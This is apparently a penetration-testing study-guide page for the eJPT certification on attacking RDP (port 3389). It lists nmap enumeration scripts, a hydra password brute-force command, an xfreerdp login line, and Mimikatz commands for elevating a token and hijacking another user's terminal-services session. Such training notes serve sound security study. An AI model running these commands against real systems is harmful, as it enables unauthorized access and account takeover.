🟢RDP 3389
eJPT RDP protocol Study guide
Enumerate RDP
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>
Brute Force
hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>
Connect to Windows RDP
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard
Hijacking RDP
Mimikatz
Invoke-Mimikatz -Command '"ts::sessions"'
Connect to the terminal services session.
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
Last updated
Was this helpful?